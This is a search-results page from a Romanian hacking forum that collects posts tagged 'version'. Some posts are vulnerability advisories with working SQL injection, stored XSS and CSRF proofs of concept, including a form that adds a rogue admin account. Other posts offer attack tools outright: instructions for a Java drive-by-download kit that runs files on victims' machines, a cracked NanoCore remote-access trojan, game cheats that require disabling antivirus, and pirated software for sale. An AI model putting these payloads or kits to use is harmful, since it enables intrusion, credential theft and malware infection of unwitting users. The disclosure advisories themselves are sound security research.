Jump to content

Search the Community

Showing results for tags 'version'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

  1. WPTouch (Enterprise Version) A complete mobile solution for wordpress. http://www.wptouch.com/pricing/ ENTERPRISE $349 Supported WordPress Sites Unlimited scriptul are updating 1 an. fara updating e pe viata. 100 euro . paypal/btc astept pm.
  2. ------------------------ ISSUE 1: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> * # Software Link: *https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip <https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>* # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a SQL Injection vulnerability available for collaborators (or higher privileged users) for webs with freshmail plugin installed. The SQL Injection in located in the attribute "id" of the inserted shortcode [FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before inserting it in a SQL query. A collaborator can insert shortcodes when he/she is editing a new post or page and can preview the results (no administrator approval needed), launching this SQL Injection. 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/shortcode.php, lines 27 and 120: Line 19: function fm_form_func($atts) [...] Line 27: $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";'); [...] Line 120: add_shortcode('FM_form', 'fm_form_func'); 3. Proof of concept --------------------------- 1. As collaborator, start a new post. 2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b'] 3. Click preview. 4. If the form is shown, the statement is true, if not, false. POST /wp-admin/post.php HTTP/1.1 Host: <web> Content-Length: 3979 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: <web> User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary384PE6lRgBcOibkL Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_f305[...] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wpnonce" 0a75a3666b ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="user_ID" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="action" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="originalaction" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_author" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_type" post ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_post_status" pending ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="referredby" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_original_http_referer" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_ID" 69 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="meta-box-order-nonce" f8aa04e508 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="closedpostboxesnonce" ebf65a43ed ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_title" Testing SQLi in shortcode ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="samplepermalinknonce" e753a2d8f2 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="content" [FM_form id='1" and substr(user(),1,1)="b] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="wp-preview" dopreview ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_publish" Submit for Review ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_format" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="tax_input[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="newtag[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="excerpt" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="trackback_url" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyselect" #NONE# ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyinput" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metavalue" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_ajax_nonce-add-meta" 6a13a5a808 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="advanced_view" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="comment_status" open ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="ping_status" open ------WebKitFormBoundary384PE6lRgBcOibkL-- 5. Solution --------------- Update to version 1.6 ------------------------ ISSUE 2: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> # Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter *fm_form_id. * 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50 [...] Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func'); Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func'); [...] Line 44: $result =3D $_POST; [...] Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id=3D"'.*$result['fm_form_id']*.'";'); [...] 3. Proof of concept --------------------------- POST /wp-admin/admin-ajax.php HTTP/1.1 Host: <web> X-Requested-With: XMLHttpRequest [...] Cookie: wordpress_f30[...] form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and "a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F 4. Explanation --------------------- A page visitor can submit an email (fake@fake.com) to subscribe to the formulary with fm_form_id=3D"1" and the JSON message received will be simil= ar to: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Your sign up request was successful! Please check your email inbox.*"} The second time he tries to do the same with the same email the message returned will be: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Given email address is already subscribed, thank you!*"} If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa= me message indicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message indicating that the username first character is not an "a". 5. Solution --------------- Update to version 1.6 Source
  3. ================================================================ CSRF/Stored XSS Vulnerability in Ad Buttons Plugin ================================================================ . contents:: Table Of Content Overview ======== * Title :CSRF and Stored XSS Vulnerability in Ad Buttons Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/ad-buttons/ * Severity: HIGH * Version Affected: Version 2.3.1 and mostly prior to it * Version Tested : Version 2.3.1 * version patched: Description =========== Vulnerable Parameter -------------------- * Your Ad Here' url About Vulnerability ------------------- This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= After installing the plugin 1. Goto Dashboard --> Ad button --> Setting 2. Insert this payload ## ">><script>+-+-1-+-+alert(document.cookie)</script> ## Into above mention Vulnerable parameter Save settings and see XSS in action 3. Visit Ad Button settings page of this plugin anytime later and you can see the script executing as it is stored. Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below CSRF POC Code ============= <html> <body> <form action="http://127.0.0.1/wp/wp-admin/admin.php?page=ad-buttons-settings" method="POST"> <input type="hidden" name="ab_dspcnt" value="1" /> <input type="hidden" name="ab_title" value="" /> <input type="hidden" name="ab_target" value="bnk" /> <input type="hidden" name="ab_powered" value="1" /> <input type="hidden" name="ab_count" value="1" /> <input type="hidden" name="ab_yaht" value="pag" /> <input type="hidden" name="ab_yourad" value="44" /> <input type="hidden" name="ab_yahurl" value="">><script>+-+-1-+-+alert(6)</script>" /> <input type="hidden" name="ab_adsense_fixed" value="1" /> <input type="hidden" name="ab_adsense_pos" value="1" /> <input type="hidden" name="ab_adsense_pubid" value="pub-" /> <input type="hidden" name="ab_adsense_channel" value="" /> <input type="hidden" name="ab_adsense_corners" value="rc:0" /> <input type="hidden" name="ab_adsense_col_border" value="#" /> <input type="hidden" name="ab_adsense_col_title" value="#" /> <input type="hidden" name="ab_adsense_col_bg" value="#" /> <input type="hidden" name="ab_adsense_col_txt" value="#" /> <input type="hidden" name="ab_adsense_col_url" value="#" /> <input type="hidden" name="ab_width" value="<img" /> <input type="hidden" name="ab_padding" value="<img" /> <input type="hidden" name="Submit" value="Save Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html> Mitigation ========== Plugin Closed Change Log ========== Plugin Closed Disclosure ========== 18-April-2015 Reported to Developer Plugin Closed 8-May-2015 Public credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh (at) me (dot) com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source
  4. OS Solution OSProperty 2.8.0 was vulnerable to an unauthenticated SQL injection in the country_id parameter of the request made to retrieve a list of states for a given country. The version was not bumped when the vulnerability was fixed, but if you download after April 27th, you downloaded a fixed version. http://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property http://joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html Example URL: http://172.31.16.51/index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31 Parameter: country_id (GET) Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31' UNION ALL SELECT NULL,CONCAT(0x716a627171,0x797774584a4b4954714d,0x7162717071)# -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website Source
  5. Readme: Step 1.) Open game.java and change fileLink to a link to a ZIPPED file that you want to download and execute to the remote pc.. Step 2.) whilst still in game.java change fileDir to the directory of the computer where you want to download your application to. Step 3.) Find out what JDK version you have and edit the three .bat files to correspond to your JDK version - Example: "C:\Program Files\Java\jdk1.6.0_16\bin\javac.exe" -cp . *.java This shows my version of JDK is 1.6.0_16 if you go to 'C:\Program Files\Java\' and see what version of jdk you had e.g. 1.6.0_21 you would change the three files so that it was like so: "C:\Program Files\Java\jdk1.6.0_21\bin\javac.exe" Step 4.) Run Compile.bat if no errors show then proceed to step 5. Step 5.) Run Make JAR-FILE.bat Step 6.) Run 'SIGN YOUR JAR.bat' and when prompted enter the password 'java123' it will not show your typing but it will be there after typing 'java123' hit enter. Step 7.) Upload yourfile.zip, Client.html, and Client.jar to a webhost, and then send people to http://yourlink.com/Client.html to execute the Drive By Download on them. Download
  6. What is IPB (Invision Power Board) ? : Invision Power Board is a Software Forum Designed and Made by Invision Power Services. Invision Power Services (IPS) was created in 2002 by Charles Warner and Matt Mecham after they left Jarvis Entertainment Group. It is a forum which is on or made on MySQL Database, The Invision Power Board is written or developed on PHP Language. While Invision Power Board is a commercially Public sold product, there is a large modding community and there are many of these modifications which are free. The IPB (Invision Power Board) releases a series of thier Product Versions. The First Version releases of Invision Power Board were available as a download free charge under a proprietary license. The version 1.3 is merely used on free of costs forum hosts such as Invision-Free. Since these were released many exploits had been found and they keep updating and patching them. The Second Version was exact like 1.3.1, the same liscence too it was also a free of cost forum host. But after there first update release the version 2.0.1 the download limit was replaced with 5000Posts, 1000 threads a free demo. Many users were got upset with that. The version 3.x was released in 2009. It was a great milestone for IPB Company because of the Forum Software. The version 3.x released in 2010 the modified version as we saw the Modification made by the IPB. The Search Engine Optimization, its integration with Social Networking Websites like Facebook, Twitter etc. The Version 3.x was really a great product by IPB unless an exploit has been found in it . And it was SQL – Injection exploit. The Vulnerable Paramter is in ‘/interface/ipsconnect/ipsconnect.php’ There is a $_POST Parameter Vulnerability there.. Post Parameter : act=login&idType=id&id=’id here’ <-- Here is the Vulnerable Parameter. the $_POST['id'] parameter is vulnerable. It can easily be exploited with Error Based SQL Injection or Blind Based SQL Injection. There's Many exploit have been made of this exploit. This is high-level vulnerability as many sites are on IPB Forum. Exploit here: Private Paste - Pastie
  7. Title: Stored XSS Vulnerability in Add Link to Facebook Wordpress Plugin Author: Rohit Kumar Plugin Homepage: http://wordpress.org/extend/plugins/add-link-to-facebook/ Severity: Medium Version Affected: Version 1.215 and mostly prior to it. Version Tested: Version 1.215 Version Patched : 1.215 Description: Vulnerable Parameter 1. App ID 2. App Secret 3. Custom Picture URL 4. Default Picture URL 5. URL News Feed Icon About Vulnerability This plugin is vulnerable to Stored Cross Site Scripting Vulnerability. This issue was exploited when user accessed to Add Link to Facebook Settings in Wordpress with Administrator privileges. A malicious administrator can hijack other users sessions, take control of another administrators browser or install malware on their computer. Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) Steps to Reproduce: After installing the plugin: Goto Settings All in One Facebook Input this payload in App ID :- ><script>alert(1)</script> Click on the Save button. After reloading the page you will see a Pop Up Box with 1 written on it. Reload the page again to make sure its stored. Change Log https://wordpress.org/plugins/add-link-to-facebook/changelog/ Disclosure 09th March 2015 Source: http://packetstorm.wowhacker.com/1504-advisories/wpfacebook-xss.txt
  8. ======================================================================= title: SQL Injection product: WordPress Tune Library Plugin vulnerable version: 1.5.4 (and probably below) fixed version: 1.5.5 CVE number: CVE-2015-3314 impact: CVSS Base Score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) homepage: https://wordpress.org/plugins/tune-library/ found: 2015-01-09 by: Hannes Trunde mail: hannes.trunde@gmail.com twitter: @hannestrunde ======================================================================= Plugin description: ------------------- "This plugin is used to import an XML iTunes Music Library file into your WordPress database. Once imported, you can display a complete listing of your music collection on a page of your WordPress site." Source: [url]https://wordpress.org/plugins/tune-library/[/url] Recommendation: --------------- The author has provided a fixed plugin version which should be installed immediately. Vulnerability overview/description: ----------------------------------- Because of insufficient input validation, a sql injection attack can be performed when sorting artists by letter. However, special conditions must be met in order to exploit this vulnerability: 1) The wordpress security feature wp_magic_quotes(), which is enabled by default, has to be disabled. 2) The plugin specific option "Filter artists by letter and show alphabetical navigation" has to be enabled. Proof of concept: ----------------- The following HTTP request to the Tune Library page returns version, current user and db name: =============================================================================== [url]http://www.site.com/?page_id=2&artistletter=G[/url]' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20 =============================================================================== Contact timeline: ------------------------ 2015-04-08: Contacting author via mail. 2015-04-09: Author replies and announces a fix within a week. 2015-04-12: Mail from author, stating that plugin has been updated. 2015-04-14: Requesting CVE via post to the open source software security mailing list: [url]http://openwall.com/lists/oss-security/2015/04/14/5[/url] 2015-04-20: Release of security advisory. Solution: --------- Update to the most recent plugin version. Workaround: ----------- Make sure that wp_magic_quotes() is enabled and/or disable "Filter artists by letter..." option. Source: http://packetstorm.wowhacker.com/1504-exploits/wptunelibrary154-sql.txt
  9. requirememnts: pc BlueStacks hack feathers: SMARTER LOOT ALWAYS ONLINE BOOST CAPABLE MORE GOLD ROYAL POWER MULTIPLE DEVICES FULLY AUTOMATED instructions: In lieu of the recent posts with Gold Pump not working with certain versions of BlueStacks, I've decided to write a guide on how to figure out what version of BlueStacks you are currently running. 1.Open BlueStacks. If you are running in window mode you can keep BlueStacks open. If not, exit or minimize BlueStacks. 2.Locate your task bar, which is on the bottom of your screen 3.Click on the little arrow if necessary to show all the applications that are hidden in your tray. 4.Hover your mouse of the BlueStacks Logo and the version number of BlueStacks should show up Please ensure that you have a BlueStacks version of at least 0.9.4.xxxx. If your BlueStacks version is older thatn 0.9.4.xxxx, you will experience issues with running Gold Pump. Please head on download BlueStacks Zippyshare.com - [Tutorial] How To Install BlueStacks & Gold Pump Minimum system requirements: Windows XP and system resolution of 1280 x 768 NOTE* - DISABLE YOUR ANTIVIRUS // ADD GOLD PUMP AS EXCEPTION Antivirus's will flag Gold Pump as a virus. Please disable your antivirus before download Gold Pump. Rest assured, Gold Pump is harmless to your system and does not contain any virus's or malware. If you would like to use Gold Pump, please disable your antivirus or add Gold Pump as an exception. 1. Download BlueStacks - 85 Million Android Users and Counting (bluestack) Click Zippyshare.com - for a for a zippyshare download Link for BlueStacks version 0.9.8. 2. Install BlueStacks. IMPORTANT - Please ensure your your BlueStacks is at least version 9.4. 3. Open BlueStacks and download Clash of Clans. download the crack here: AdF.ly - shrink your URLs and get paid! 5. Open blueRes.reg to apply resolution change. 6. Restart your computer. 6a. Link your Android account onto BlueStacks. 6b. Link your iOS account onto BlueStacks. 7. Ensure you do not have any other troops except Barbarian and Archers in your camp. Royal's and Clan Castle troops are fine. 8. Place the first Barrack in the right most corner of your base. video tutrial: YouTube 9. Select settings that best suit your TH and army capacity. 10. Press [sTART PUMPING GOLD]. Run Gold Pump as admin to remember search requirement / troop capacity / barrack settings. Password: leakforums.org credits: leakforums.org
  10. #Cheat's for cs 1.6 / cs g.o #Work eac #work steam #Vac all update #Work anti cheats all version #Anti screen #Esp box Descarcati doar pentru analiza, este mallware https://www.sendspace.com/file/vhlt2v Download Cubex software [HL1] elementary aimbot version 5.2.rar
  11. =============================================================================== CSRF/Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin =============================================================================== . contents:: Table Of Content Overview ======== * Title :Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/ab-google-map-travel/ * Severity: HIGH * Version Affected: Version 3.4 and mostly prior to it * Version Tested : Version 3.4 * version patched: 4.0 * CVE ID : CVE-2015-2755 Description =========== Vulnerable Parameter -------------------- * Latitude: * Longitude: * Map Width: * Map Height: * Map Zoom: * And all Input Boxes About Vulnerability ------------------- This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= After installing the plugin After installing the plugin 1. Goto settings -> Google Map Travel 2. Insert this payload ## "> <script>+-+-1-+-+alert(document.cookie)</script> ## Into Any above mention Vulnerable parameter Save settings and see XSS in action 3. Visit Google Map Travel settings page of this plugin anytime later and you can see the script executing as it is stored. Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below <html> <body> <form action="http://localhost/wordpress/wp-admin/admin.php?page=ab_map_options" method="POST"> <input type="hidden" name="lat" value=""> <script>+-+-1-+-+alert(document.cookie)</script>" /> <input type="hidden" name="long" value="76.26730" /> <input type="hidden" name="lang" value="en" /> <input type="hidden" name="map_width" value="500" /> <input type="hidden" name="map_height" value="300" /> <input type="hidden" name="zoom" value="7" /> <input type="hidden" name="day_less_five_fare" value="llllll" /> <input type="hidden" name="day_more_five_fare" value="1.5" /> <input type="hidden" name="less_five_fare" value="3" /> <input type="hidden" name="more_five_fare" value="2.5" /> <input type="hidden" name="curr_format" value="$" /> <input type="hidden" name="submit" value="Update Settings" /> <input type="submit" value="Submit request" /> </form> </body> </html> . image:: csrf.jpeg :height: 1000 px :width: 1000 px :scale: 100 % :alt: XSS POC :align: center Mitigation ========== Update to version 4.0 Change Log ========== https://wordpress.org/plugins/ab-google-map-travel/changelog/ Disclosure ========== 07-March-2015 Reported to Developer 11-March-2015 Reported to Wordpress 11-March-2015 Acknowledgement from Developer 16-March-2015 Wordpress reviwed and publish the updated plugin. 16-March-2015 Requested for CVE ID 27-March-2015 CVE Assign 28-March-2015 Reposted with CVE ID credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source: http://dl.packetstormsecurity.net/1503-exploits/wpabgmt-xssxsrf.txt
  12. =============================================================================== CSRF to add admin user Vulnerability In Manage Engine Device Expert =============================================================================== . contents:: Table Of Content Overview ======== * Title : CSRF to add admin user Vulnerability In Manage Engine Device Expert * Author: Kaustubh G. Padwad * Plugin Homepage: http://www.manageengine.com/products/device-expert/ * Severity: HIGH * Version Affected: Version 5.9.9.0 Build: 5990 * Version Tested : Version 5.9.9.0 Build: 5990 * version patched: Separate Patch release for all version Description =========== About the Product ================= DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management. Vulnerable Parameter -------------------- Create user form About Vulnerability ------------------- This Cross-Site Request Forgery vulnerability enables an anonymous attacker to add an admin account into the application. This leads to compromising the whole domain as the application normally uses privileged domain account to perform administration tasks. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= * Add follwing code to webserver and send that malicious link to application Admin. * The admin should be loggedin when he clicks on the link. * Soical enginering might help here For Example :- Device password has been changed click here to reset ####################CSRF COde####################### <html> <body> <form action="https://Server-IP:6060/STATE_ID/1423516534014/CreateUser.ve" method="POST"> <input type="hidden" name="loginName" value="hackerkaustubh" /> <input type="hidden" name="password" value="kaustubh" /> <input type="hidden" name="confirmpass" value="kaustubh" /> <input type="hidden" name="emailaddress" value="kingkaustubh@me.com" /> <input type="hidden" name="SEND_EMAIL" value="true" /> <input type="hidden" name="roles" value="Administrator" /> <input type="hidden" name="ComponentSelection" value="SpecificDevice" /> <input type="hidden" name="searchfield" value="--Search Devices--" /> <input type="hidden" name="DEVICEGROUPSELECTION" value="1" /> <input type="hidden" name="DeviceGroupDescription"/> value="This device group contains all the devices present in the inventory" /> <input type="hidden" name="QUERYID" value="-1" /> <input type="submit" value="Submit request" /> </form> </body> </html> Mitigation ========== Receved from manage engine team https://uploads.zohocorp.com/Internal_Useruploads/dnd/NetFlow_Analyzer/o_19ga51p951gblpbs1rkrm211vim1/vulnerabilities_Fix.zip Open DeviceExper.zip 1. Stop the Device Expert service. 2. Please replace AdvNCM.jar under DeviceExpert_Home/lib with the one under DeviceExpert.zip/AdvNCM.jar 3. Start the Device Expert service Change Log ========== Disclosure ========== 11-February-2015 Reported to Developer 13-February-2015 Acknodlagement from Developer 13-March-2015 Fixed by developer 16-March-2015 Requested a cve ID 21-March-2015 Public Disclosed credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source
  13. =============================================================================== Stored XSS Vulnerability In Manage Engine Device Expert =============================================================================== . contents:: Table Of Content Overview ======== * Title :Stored XSS Vulnerability In Manage Engine Device Expert * Author: Kaustubh G. Padwad * Plugin Homepage: http://www.manageengine.com/products/device-expert/ * Severity: HIGH * Version Affected: Version 5.9.9.0 Build: 5990 * Version Tested : Version 5.9.9.0 Build: 5990 * version patched: Separate Patch release for all version Description =========== About the Product ================= DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management. Vulnerable Parameter -------------------- * Login Name About Vulnerability ------------------- This Product is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can execute arbitrary code into Admin manage console. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= 1. After Setting up Manage engine Login to manage engine Device expert 2. Navigate to admin-->User Management-->New User 3.Put this Payload into Login Name 4.Fill the other details #####payload To Use####################### <BODY ONLOAD=alert('Hacked_ByS3curity_B3ast')> ########################################## 5. Click Save to See Stored XSS in action 6. Reload Pages to see it many times you want 7. Same can be done By CSRF also . image:: stoerdXSS.jpeg :height: 1000 px :width: 1000 px :scale: 100 % :alt: XSS POC :align: center Mitigation ========== Receved from manage engine team https://uploads.zohocorp.com/Internal_Useruploads/dnd/NetFlow_Analyzer/o_19ga51p951gblpbs1rkrm211vim1/vulnerabilities_Fix.zip Open DeviceExper.zip 1. Stop the Device Expert service. 2. Please replace AdvNCM.jar under DeviceExpert_Home/lib with the one under DeviceExpert.zip/AdvNCM.jar 3. Start the Device Expert service Change Log ========== Disclosure ========== 11-February-2015 Reported to Developer 13-February-2015 Acknodlagement from Developer 13-March-2015 Fixed by developer 16-March-2015 Requested a cve ID 21-March-2015 Public Disclosed credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source
  14. Found a nice cracked version of NanoCore and works amazing Grin It was coded by Aeonhack and protected with NetSeal2. Now you can use it for free. The file is 100% clean and working. Enjoy! An image of the cracked version available in the download =) -=-=-=-=-=-=DOWNLOAD=-=-=-=-=-=- https://www.sendspace.com/file/xtn48r
